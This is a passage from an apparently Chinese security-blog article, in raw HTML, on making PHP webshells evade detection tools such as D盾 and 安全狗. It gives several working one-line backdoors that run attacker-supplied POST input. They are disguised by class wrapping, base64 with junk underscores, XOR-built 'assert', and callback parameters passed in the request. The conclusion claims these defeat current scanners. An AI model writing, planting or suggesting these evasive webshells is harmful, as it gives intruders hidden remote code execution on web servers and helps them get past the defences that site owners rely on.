padding: 0px; max-width: 100%; box-sizing: border-box; word-wrap: normal; display: flex; overflow: initial; line-height: 12px; border: 0px; font-size: 10px; font-family: inherit !important; white-space: pre !important;"><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;"> &nbsp;</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">}</span></code></span></span></span></p></li><li style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important;"><p style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important; clear: both; min-height: 1em;"><span style="color: rgb(74, 74, 74);"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: block; line-height: 22px; font-size: 14px !important; word-break: inherit !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; word-wrap: break-word !important; line-height: 22px; display: block; word-break: inherit !important;"><code style="margin: 0px 0px 0px -20px; padding: 0px; max-width: 100%; box-sizing: border-box; word-wrap: normal; display: flex; overflow: initial; line-height: 12px; border: 0px; font-size: 10px; font-family: inherit !important; white-space: pre !important;"><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">}</span></code></span></span></span></p></li><li style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important;"><p style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important; clear: both; min-height: 1em;"><span style="color: rgb(74, 74, 74);"><br/></span></p></li><li style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important;"><p style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important; clear: both; min-height: 1em;"><span style="color: rgb(74, 74, 74);"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: block; line-height: 22px; font-size: 14px !important; word-break: inherit !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; word-wrap: break-word !important; line-height: 22px; display: block; word-break: inherit !important;"><code style="margin: 0px 0px 0px -20px; padding: 0px; max-width: 100%; box-sizing: border-box; word-wrap: normal; display: flex; overflow: initial; line-height: 12px; border: 0px; font-size: 10px; font-family: inherit !important; white-space: pre !important;"><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">$b </span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">=</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;"> </span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">new</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;"> me</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">;</span></code></span></span></span></p></li><li style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important;"><p style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important; clear: both; min-height: 1em;"><span style="color: rgb(74, 74, 74);"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: block; line-height: 22px; font-size: 14px !important; word-break: inherit !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; word-wrap: break-word !important; line-height: 22px; display: block; word-break: inherit !important;"><code style="margin: 0px 0px 0px -20px; padding: 0px; max-width: 100%; box-sizing: border-box; word-wrap: normal; display: flex; overflow: initial; line-height: 12px; border: 0px; font-size: 10px; font-family: inherit !important; white-space: pre !important;"><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">$b</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">-></span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">a </span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">=</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;"> $_POST</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">[</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">&#39;x&#39;</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">];</span></code></span></span></span></p></li><li style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important;"><p style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important; clear: both; min-height: 1em;"><span style="color: rgb(74, 74, 74);"><br/></span></p></li><li style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important;"><p style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important; clear: both; min-height: 1em;"><span style="color: rgb(74, 74, 74);"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: block; line-height: 22px; font-size: 14px !important; word-break: inherit !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; word-wrap: break-word !important; line-height: 22px; display: block; word-break: inherit !important;"><code style="margin: 0px 0px 0px -20px; padding: 0px; max-width: 100%; box-sizing: border-box; word-wrap: normal; display: flex; overflow: initial; line-height: 12px; border: 0px; font-size: 10px; font-family: inherit !important; white-space: pre !important;"><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">?></span></code></span></span></span></p></li></ol></code></pre><p style="margin: 15px 0px; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">用类把函数包裹,D盾对类查杀较弱</span></p><h1 style="margin: 1.5rem 0px 1rem; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">0x09 编码绕过</span></h1><p style="margin: 15px 0px; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">用php的编码函数，或者用异或等等 简单的base64_decode,其中因为他的正则匹配可以加入一些下划线干扰杀软</span></p><pre><?php
$a&nbsp;=&nbsp;base64_decode("YXNz+ZX____J____0");
$a($_POST[x]);
?></pre><p style="margin: 15px 0px; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">异或</span></p><pre><?php
$a=&nbsp;("!"^"@").&#39;ssert&#39;;
$a($_POST[x]);
?></pre><h1 style="margin: 1.5rem 0px 1rem; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">0x9 无字符特征马</span></h1><p style="margin: 15px 0px; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">对于无特征马这里我的意思是 无字符特征</span></p><ol><li><p style="margin: 0px; padding: 0px;"><span style="color: rgb(74, 74, 74);"><span style="margin: 0px; padding: 0px;"><span style="margin: 0px; padding: 0px;">利用异或,编码等方式 例如p神博客的</span></span></span><img src="https://bbs.zkaq.cn/upload/userfile/639/b568ac96c86abc7b52aee5ada1c4c52a.png"/></p></li></ol><ol><li><p style="margin: 0px; padding: 0px;"><span style="color: rgb(74, 74, 74);"><br/></span></p><p style="margin: 0px 0px 15px; padding: 0px;"><span style="color: rgb(74, 74, 74);">利用正则匹配字符 如Tab等 然后转换为字符</span></p><p style="margin: 0px; padding: 0px;"><span style="color: rgb(74, 74, 74);"><br/></span></p></li><li><p style="margin: 0px; padding: 0px;"><span style="color: rgb(74, 74, 74);"><br/></span></p><p style="margin: 0px 0px 15px; padding: 0px;"><span style="color: rgb(74, 74, 74);">利用POST包获取关键参数执行 例如</span></p><p style="margin: 0px; padding: 0px;"><span style="color: rgb(74, 74, 74);"><br/></span></p></li></ol><pre><?php&nbsp;
$decrpt&nbsp;=&nbsp;$_POST[&#39;x&#39;];
$arrs&nbsp;=&nbsp;explode("|",&nbsp;$decrpt)[1];
$arrs&nbsp;=&nbsp;explode("|",&nbsp;base64_decode($arrs));
call_user_func($arrs[0],$arrs[1]);
?></pre><h1 style="margin: 1.5rem 0px 1rem; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">0x10 PHP7.1后webshell何去何从</span></h1><p style="margin: 15px 0px; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">在php7.1后面我们已经不能使用强大的assert函数了用eval将更加注重特殊的调用方法和一些字符干扰,后期大家可能更加倾向使用大马</span></p><h1 style="margin: 1.5rem 0px 1rem; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">总结</span></h1><p style="margin: 15px 0px; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">对于安全狗杀形，d盾杀参的思路来绕过。生僻的回调函数,特殊的加密方式,以及关键词的后传入都是不错的选择。
 对于关键词的后传入对免杀安全狗，d盾，河马 等等都是不错的，后期对于菜刀的轮子，也要走向高度的自定义化 
用户可以对传出的post数据进行自定义脚本加密，再由webshell进行解密获取参数，那么以现在的软WAF查杀能力 
几乎为0，安全软件也需要与时俱进了。</span></p><p style="color: rgb(51, 51, 51);">◆来源：404安全</p><p><br/></p>